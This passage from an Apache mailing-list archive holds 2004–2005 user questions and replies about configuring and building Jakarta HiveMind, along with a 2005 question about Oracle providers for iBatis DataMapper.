-INF/hivemodule.sdl, line 9, column 29: Element construct/set-object is not allowed = here.</span></font><font size=3D2 color=3Dblue face=3D"Courier New"><span = style=3D'font-size:10.0pt;font-family: "Courier New";color:blue'><o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 color=3Dblue face=3D"Courier = New"><span style=3D'font-size:10.0pt;font-family:"Courier = New";color:blue'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>I can&#8217;t find anywhere in the documentation that = says I can&#8217;t do that, so what am I doing = wrong.<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>TIA,<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'>-kurt h<o:p></o:p></span></font></p> <p class=3DMsoNormal><font size=3D2 face=3DArial><span = style=3D'font-size:10.0pt; font-family:Arial'><o:p>&nbsp;</o:p></span></font></p> </div> </body> </html> ------_=_NextPart_001_01C46F49.6356D188-- From [email protected] Wed Jul 21 19:24:37 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 12000 invoked from network); 21 Jul 2004 19:24:37 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 21 Jul 2004 19:24:37 -0000 Received: (qmail 35388 invoked by uid 500); 21 Jul 2004 19:24:37 -0000 Delivered-To: [email protected] Received: (qmail 35336 invoked by uid 500); 21 Jul 2004 19:24:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 35272 invoked by uid 99); 21 Jul 2004 19:24:35 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=BLANK_LINES_70_80,RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 21 Jul 2004 12:24:32 -0700 Received: by mproxy.gmail.com with SMTP id u15so5212cwc for <[email protected]>; Wed, 21 Jul 2004 12:24:22 -0700 (PDT) Received: by 161.129.204.104 with SMTP id x56mr13299cwb; Wed, 21 Jul 2004 12:24:22 -0700 (PDT) Message-ID: <[email protected]> Date: Wed, 21 Jul 2004 15:24:22 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected] Subject: Re: invoke-factory question In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N set-object is only available via CVS at this time; it will be part of the 1.0-beta-2 release coming soon. When it works, it will look like: set-object( property=someobject value=instance:com.etranscor.some.ParameterLessConstructor) I changed SDL to allow colons inside an unquoted attribute value. ----- Original Message ----- From: Kurt R. Hoehn <[email protected]> Date: Wed, 21 Jul 2004 13:37:26 -0400 Subject: invoke-factory question To: [email protected] Hello, I'm trying to do the following, service-point( id=AddressBuilder interface=com.etranscor.bean.address.Address ) { invoke-factory( service-id=hivemind.BuilderFactory ) { construct( class=com.etranscor.bean.address.AddressImpl ) { set-object( property=someobject value="instance:com.etranscor.some.ParameterLessConstructor" ) // set-object( property=someobject value=com.etranscor.some.ParameterLessConstructor ) also did not work } } } I keep getting the following error org.apache.hivemind.impl.DefaultErrorHandler.error(DefaultErrorHandler.java:37) SchemaProcessorImpl [ERROR] Error at jar:file:/C:/Development/workspace/etranscor/dist/etranscor-1.0.jar!/META-INF/hivemodule.sdl, line 9, column 29: Element construct/set-object is not allowed here. I can't find anywhere in the documentation that says I can't do that, so what am I doing wrong. TIA, -kurt h -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 28 19:30:16 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 7255 invoked from network); 28 Jul 2004 19:30:16 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Jul 2004 19:30:16 -0000 Received: (qmail 68071 invoked by uid 500); 28 Jul 2004 19:30:15 -0000 Delivered-To: [email protected] Received: (qmail 68023 invoked by uid 500); 28 Jul 2004 19:30:15 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 68010 invoked by uid 99); 28 Jul 2004 19:30:15 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO omni-mail.omnidata.co.ma) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 28 Jul 2004 12:30:10 -0700 Subject: compilation pb MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Wed, 28 Jul 2004 19:29:07 -0000 Content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: invoke-factory question Thread-Index: AcRvWEPSINrdpcz/QZ+Wz2/AcGQLxwFgDdKg From: "Ilia Honsali" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N while trying to compile hivemind source I have compilation error cause = there is some missing classes=20 org.apache.hivemind.sdl.parser.ParseException org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; org.apache.hivemind.sdl.parser.TokenMgrError; note that this classes are present in the .jar thanks for help --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jul 28 21:27:27 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 59585 invoked from network); 28 Jul 2004 21:27:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 28 Jul 2004 21:27:27 -0000 Received: (qmail 95752 invoked by uid 500); 28 Jul 2004 21:27:27 -0000 Delivered-To: [email protected] Received: (qmail 95675 invoked by uid 500); 28 Jul 2004 21:27:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 95662 invoked by uid 99); 28 Jul 2004 21:27:26 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO imail2.gazeta.pl) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Wed, 28 Jul 2004 14:27:24 -0700 Received: from poczta.gazeta.pl (unverified [161.129.204.104]) by (imail2.gazeta.pl) with ESMTP id 36819577 for <[email protected]>; Wed, 28 Jul 2004 23:27:16 +0300 Received: from [161.129.204.104] (unverified [161.129.204.104]) by mailis01.gazeta.pl (mailis01.gazeta.pl) with ESMTP id 11222194 for <[email protected]>; Wed, 28 Jul 2004 23:27:15 +0200 Message-ID: <[email protected]> Date: Wed, 28 Jul 2004 23:27:08 +0200 From: Michal <[email protected]> User-Agent: Mozilla Thunderbird 0.7.1 (X11/20040626) X-Accept-Language: en-us, en MIME-Version: 1.0 To: [email protected] Subject: Re: compilation pb References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Smite-Info: SmiteCRC Jun 28 2004 X-Smite-CRC: A$x8M4T$U5Xj4l#1qY1adh#1DQC8x4$1AE9cDM$19SaRKA$19gS96#5i8W13#1m0k1C8 X-IP-stats: Incoming Outgoing Last 0, First 9, in=509335, out=1041, spam=0 X-External-IP: 161.129.204.104 X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Ilia Honsali wrote: > while trying to compile hivemind source I have compilation error cause there is some missing classes > > org.apache.hivemind.sdl.parser.ParseException > org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; > org.apache.hivemind.sdl.parser.TokenMgrError; > > note that this classes are present in the .jar > > thanks for help > if you could write a little bit more about which version of HiveMind you`re using and how your build process proceeds maybe someone could help you ... ms --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 29 09:15:44 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79854 invoked from network); 29 Jul 2004 09:15:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Jul 2004 09:15:43 -0000 Received: (qmail 15340 invoked by uid 500); 29 Jul 2004 09:15:43 -0000 Delivered-To: [email protected] Received: (qmail 15308 invoked by uid 500); 29 Jul 2004 09:15:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 15292 invoked by uid 99); 29 Jul 2004 09:15:42 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO omni-mail.omnidata.co.ma) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 29 Jul 2004 02:15:34 -0700 Subject: RE: compilation pb MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Thu, 29 Jul 2004 09:14:29 -0000 Content-class: urn:content-classes:message X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: compilation pb Thread-Index: AcR06Y5zNn6B8EoRQne3i3WGUl2XtwAYCaaA From: "Ilia Honsali" <[email protected]> To: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I am using hivemind-1.0-beta-1 I downloaded all the dependencies and I am trying to compile (in = eclipse) the source located in : framework/src/java/ framework/src/test/ library/src/java/ library/src/test/ there is two classes that does not compile org.apache.hivemind.sdl.parser.SystemParseException org.apache.hivemind.sdl.SDLResourceParser cause these classes reference the missing ones org.apache.hivemind.sdl.parser.ParseException org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; org.apache.hivemind.sdl.parser.TokenMgrError; note that in viewcvs they also does not exist http://cvs.apache.org/viewcvs.cgi/jakarta-hivemind/framework/src/java/org= /apache/hivemind/sdl/parser/?hideattic=3D0&only_with_tag=3DHEAD but they are referenced in the api of the beta2 http://jakarta.apache.org/hivemind/hivemind/apidocs/org/apache/hivemind/s= dl/parser/ -----Message d'origine----- De : Michal [mailto:[email protected]] Envoy=E9 : mercredi 28 juillet 2004 21:27 =C0 : [email protected] Objet : Re: compilation pb Ilia Honsali wrote: > while trying to compile hivemind source I have compilation error cause = there is some missing classes=20 >=20 > org.apache.hivemind.sdl.parser.ParseException > org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; > org.apache.hivemind.sdl.parser.TokenMgrError; >=20 > note that this classes are present in the .jar >=20 > thanks for help >=20 if you could write a little bit more about which version of HiveMind you`re using and how your build process proceeds maybe someone could help you ... ms --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jul 29 10:37:08 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 23113 invoked from network); 29 Jul 2004 10:37:07 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 29 Jul 2004 10:37:07 -0000 Received: (qmail 60014 invoked by uid 500); 29 Jul 2004 10:37:07 -0000 Delivered-To: [email protected] Received: (qmail 59932 invoked by uid 500); 29 Jul 2004 10:37:07 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 59906 invoked by uid 99); 29 Jul 2004 10:37:06 -0000 X-ASF-Spam-Status: No, hits=0.6 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO ns2.post.ch) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Thu, 29 Jul 2004 03:37:00 -0700 Received: from hpie0c.post.ch (hpie0c.post.ch [161.129.204.104]) by ns2.post.ch (8.13.0/8.13.0) with SMTP id i6TAas4S011080 for <[email protected]>; Thu, 29 Jul 2004 12:36:54 +0200 Received: from nodnsquery(161.129.204.104) by hpie0c.post.ch via csmap id 35257484_e14b_11d8_927d_00304811b3c7_17002; Thu, 29 Jul 2004 12:36:53 +0200 (CEST) Received: from hmsx00.pnet.ch (hmsx00.pnet.ch [161.129.204.104]) by hcehan.post.ch (8.13.0/8.13.0) with ESMTP id i6TAaquM214807 for <[email protected]>; Thu, 29 Jul 2004 12:36:52 +0200 (CEST) Received: from hmsx01.pnet.ch ([161.129.204.104]) by hmsx00.pnet.ch with Microsoft SMTPSVC(5.0.2195.6713); Thu, 29 Jul 2004 12:36:53 +0200 X-MimeOLE: Produced By Microsoft Exchange V6.0.6556.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: RE: compilation pb Date: Thu, 29 Jul 2004 12:36:53 +0200 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: compilation pb Thread-Index: AcR06Y5zNn6B8EoRQne3i3WGUl2XtwAYCaaAAAM+M/A= From: <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 29 Jul 2004 10:36:53.0660 (UTC) FILETIME=[F6CF45C0:01C47557] X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N The problem is that the missing classes are generated by JavaCC during = the build. But this generation is only invoked if you use Ant with the = build.xml in the source. Note that you only have to do this once, after = that you can use your IDE for further compilations. I recommend that you grab the latest source from CVS as this is = considerably easier to compile. With beta-1 you first have to download = ant-grabber.jar [1] and copy it to your $ANT_HOME/lib. --knut [1] ant-grabber.jar is part of this ZIP = http://howardlewisship.com/downloads/AntGrab.zip > -----Original Message----- > From: Ilia Honsali [mailto:[email protected]]=20 > Sent: Donnerstag, 29. Juli 2004 11:14 > To: [email protected] > Subject: RE: compilation pb >=20 >=20 > I am using hivemind-1.0-beta-1 > I downloaded all the dependencies and I am trying to compile=20 > (in eclipse) the source located in : > framework/src/java/ > framework/src/test/ > library/src/java/ > library/src/test/ >=20 > there is two classes that does not compile > org.apache.hivemind.sdl.parser.SystemParseException > org.apache.hivemind.sdl.SDLResourceParser >=20 > cause these classes reference the missing ones > org.apache.hivemind.sdl.parser.ParseException > org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; > org.apache.hivemind.sdl.parser.TokenMgrError; >=20 > note that in viewcvs they also does not exist > http://cvs.apache.org/viewcvs.cgi/jakarta-hivemind/framework/s rc/java/org/apache/hivemind/sdl/parser/?hideattic=3D0&only_with_tag=3DHEA= D but they are referenced in the api of the beta2 http://jakarta.apache.org/hivemind/hivemind/apidocs/org/apache/hivemind/s= dl/parser/ -----Message d'origine----- De : Michal [mailto:[email protected]] Envoy=E9 : mercredi 28 juillet 2004 21:27 =C0 : [email protected] Objet : Re: compilation pb Ilia Honsali wrote: > while trying to compile hivemind source I have compilation error cause = there is some missing classes=20 >=20 > org.apache.hivemind.sdl.parser.ParseException > org.apache.hivemind.sdl.parser.SimpleDataLanguageParser; > org.apache.hivemind.sdl.parser.TokenMgrError; >=20 > note that this classes are present in the .jar >=20 > thanks for help >=20 if you could write a little bit more about which version of HiveMind you`re using and how your build process proceeds maybe someone could help you ... ms --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 30 12:27:44 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25516 invoked from network); 30 Jul 2004 12:27:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Jul 2004 12:27:44 -0000 Received: (qmail 44917 invoked by uid 500); 30 Jul 2004 12:27:44 -0000 Delivered-To: [email protected] Received: (qmail 44825 invoked by uid 500); 30 Jul 2004 12:27:43 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 44794 invoked by uid 99); 30 Jul 2004 12:27:43 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FORGED_RCVD_HELO X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO homer.multicom.co.uk) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 30 Jul 2004 05:27:42 -0700 Received: from localhost (localhost [161.129.204.104]) by homer.multicom.co.uk (Postfix) with ESMTP id 93D3B191C7 for <[email protected]>; Fri, 30 Jul 2004 13:35:25 +0100 (BST) Received: from homer.multicom.co.uk ([161.129.204.104]) by localhost (homer [161.129.204.104]) (amavisd-new, port 10024) with ESMTP id 09198-07 for <[email protected]>; Fri, 30 Jul 2004 13:35:24 +0100 (BST) Received: from musashi.howell.com (janus.multicom.co.uk [161.129.204.104]) by homer.multicom.co.uk (Postfix) with ESMTP id 6DF9817436 for <[email protected]>; Fri, 30 Jul 2004 13:35:24 +0100 (BST) Subject: Example Help From: Tim Langford <[email protected]> Reply-To: [email protected] To: [email protected] Content-Type: text/plain Organization: Multicom Products Ltd. Message-Id: <[email protected]> Mime-Version: 1.0 X-Mailer: Ximian Evolution 1.4.4 Date: Fri, 30 Jul 2004 13:28:06 +0100 Content-Transfer-Encoding: 7bit X-Virus-Scanned: by [email protected] X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Hello Everyone, I may be being a bit of a muppet, but I dont seem to able to run the calculator example for hivemind from the ant script as specified in the doco because I cant find the required ant file.target. Do I have to download this from somewhere else, or am I just being stupid? Thanks for your time! Tim -- Tim Langford <[email protected]> Multicom Products Ltd. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Jul 30 14:29:46 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10960 invoked from network); 30 Jul 2004 14:29:46 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 30 Jul 2004 14:29:45 -0000 Received: (qmail 94580 invoked by uid 500); 30 Jul 2004 14:29:22 -0000 Delivered-To: [email protected] Received: (qmail 94515 invoked by uid 500); 30 Jul 2004 14:29:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 94321 invoked by uid 99); 30 Jul 2004 14:29:20 -0000 X-ASF-Spam-Status: No, hits=1.3 required=10.0 tests=RCVD_BY_IP,SB_NEW_BULK,SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO mproxy.gmail.com) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with ESMTP; Fri, 30 Jul 2004 07:29:16 -0700 Received: by mproxy.gmail.com with SMTP id 78so88278rnl for <[email protected]>; Fri, 30 Jul 2004 07:29:15 -0700 (PDT) Received: by 161.129.204.104 with SMTP id a51mr202025rnb; Fri, 30 Jul 2004 07:29:15 -0700 (PDT) Message-ID: <[email protected]> Date: Fri, 30 Jul 2004 10:29:15 -0400 From: Howard Lewis Ship <[email protected]> To: [email protected], [email protected] Subject: Re: Example Help In-Reply-To: <[email protected]> Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit References: <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N A lot of that code is only in CVS at the moment, so it just won't work for the beta-1 download. On Fri, 30 Jul 2004 13:28:06 +0100, Tim Langford <[email protected]> wrote: > Hello Everyone, > > I may be being a bit of a muppet, but I dont seem to able to run the > calculator example > for hivemind from the ant script as specified in the doco because I cant > find the required ant file.target. Do I have to download this > from somewhere else, or am I just being stupid? > > Thanks for your time! > > Tim > > -- > Tim Langford <[email protected]> > Multicom Products Ltd. > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] > > -- Howard M. Lewis Ship Independent J2EE / Open-Source Java Consultant Creator, Jakarta Tapestry Creator, Jakarta HiveMind http://howardlewisship.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Thu Dec 01 10:03:47 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55520 invoked from network); 1 Dec 2005 10:03:47 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Dec 2005 10:03:47 -0000 Received: (qmail 34187 invoked by uid 500); 1 Dec 2005 10:03:47 -0000 Delivered-To: [email protected] Received: (qmail 34167 invoked by uid 500); 1 Dec 2005 10:03:46 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 34156 invoked by uid 99); 1 Dec 2005 10:03:46 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 02:03:46 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO mail.sbs-softwaresysteme.de) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 02:05:12 -0800 Received: (qmail 19927 invoked from network); 1 Dec 2005 11:03:21 +0100 Received: by simscan 1.1.0 ppid: 28397, pid: 6078, t: 2.7733s scanners: clamav: 0.87/m:34/d:1198 spam: 3.0.4 Received: from unknown (HELO sbs-softwaresysteme.de) (161.129.204.104) by mail.sbs-softwaresysteme.de with SMTP; 1 Dec 2005 11:03:18 +0100 Message-ID: <[email protected]> Date: Thu, 01 Dec 2005 11:03:17 +0100 From: Uwe Lesta <[email protected]> User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax) X-Accept-Language: de-de, de, en-gb, en-us MIME-Version: 1.0 To: [email protected] Subject: Oracle provider with iBatis dataMapper 1.2 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-Spam-Checker-Version: SpamAssassin 3.0.4 (2005-06-05) on mail.sbs-softwaresysteme.de X-Spam-Level: X-Virus-Checked: Checked by ClamAV on apache.org X-Old-Spam-Status: No, score=-0.4 required=4.9 tests=AWL,BAYES_00, RCVD_IN_NJABL_DUL,RCVD_IN_SORBS_DUL autolearn=no version=3.0.4 X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Hello, I like to ask: Which seems to be the best Oracle provider to work with the ibatis DataMapper 1.2 ( latest SVN version ) ? Background: I get different TypeExceptions on different columntypes on different providers. -- Kind regards Uwe [email protected] From [email protected] Thu Dec 01 20:30:21 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56910 invoked from network); 1 Dec 2005 20:30:20 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Dec 2005 20:30:20 -0000 Received: (qmail 4959 invoked by uid 500); 1 Dec 2005 20:30:20 -0000 Delivered-To: [email protected] Received: (qmail 4935 invoked by uid 500); 1 Dec 2005 20:30:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4924 invoked by uid 99); 1 Dec 2005 20:30:19 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 12:30:19 -0800 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 12:31:46 -0800 Received: from cmxrly02.futureshop.com (localhost [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB1KJWDL015216 for <[email protected]>; Thu, 1 Dec 2005 12:22:12 -0800 (PST) Received: (from root@localhost) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.8/Submit) id jB1JxNH9020173 for [email protected]; Thu, 1 Dec 2005 11:59:23 -0800 (PST) Received: from CPREXN100.itdmis02.futureshop.com (cprexn100 [161.129.204.104]) by cmxrly02.futureshop.com (8.12.9+Sun/8.12.9) with ESMTP id jB1JwBBf019093 for <[email protected]>; Thu, 1 Dec 2005 11:59:23 -0800 (PST) Received: from CPREXN020-EVS.itdmis02.futureshop.com ([161.129.204.104]) by CPREXN100.itdmis02.futureshop.com with Microsoft SMTPSVC(6.0.3790.211); Thu, 1 Dec 2005 12:06:45 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Subject: RE: Oracle provider with iBatis dataMapper 1.2 Date: Thu, 1 Dec 2005 12:05:55 -0800 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Oracle provider with iBatis dataMapper 1.2 Thread-Index: AcX2Xsv1rjdlqRm+QvKb4u+y4JfQ1gAU7Heg From: "Jeremy Gray" <[email protected]> To: <[email protected]> X-OriginalArrivalTime: 01 Dec 2005 20:06:45.0757 (UTC) FILETIME=[C14CBAD0:01C5F6B2] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by cmxrly02.futureshop.com id jB1JwBBf019093 X-Virus-Checked: Checked by ClamAV on apache.org X-Spam-Rating: minotaur.apache.org 1.6.2 0/1000/N Can you provide any details regarding the exceptions you are seeing? We too encountered some early on, specifically with respect to default type conversion of certain sizes of oracle number fields, and might be able to point you in the right direction. Jeremy Gray -----Original Message----- From: Uwe Lesta [mailto:[email protected]] Sent: Thursday, December 01, 2005 2:03 AM To: [email protected] Subject: Oracle provider with iBatis dataMapper 1.2 Hello, I like to ask: Which seems to be the best Oracle provider to work with the ibatis DataMapper 1.2 ( latest SVN version ) ? Background: I get different TypeExceptions on different columntypes on different providers. -- Kind regards Uwe [email protected] From [email protected] Thu Dec 01 20:41:22 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62088 invoked from network); 1 Dec 2005 20:41:17 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 1 Dec 2005 20:41:16 -0000 Received: (qmail 24070 invoked by uid 500); 1 Dec 2005 20:40:51 -0000 Delivered-To: [email protected] Received: (qmail 22068 invoked by uid 500); 1 Dec 2005 20:40:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user-cs.ibatis.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21727 invoked by uid 99); 1 Dec 2005 20:40:29 -0000 Received: from asf.osuosl.org (HELO asf.osuosl.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 12:40:29 -0800 X-ASF-Spam-Status: No, hits=0.3 required=10.0 tests=HTML_FONT_BIG,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: neutral (asf.osuosl.org: local policy) Received: from [161.129.204.104] (HELO cmxrly02.futureshop.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 01 Dec 2005 12:39:57 -0800 Received: from cmxrly02.futureshop.com (localhost 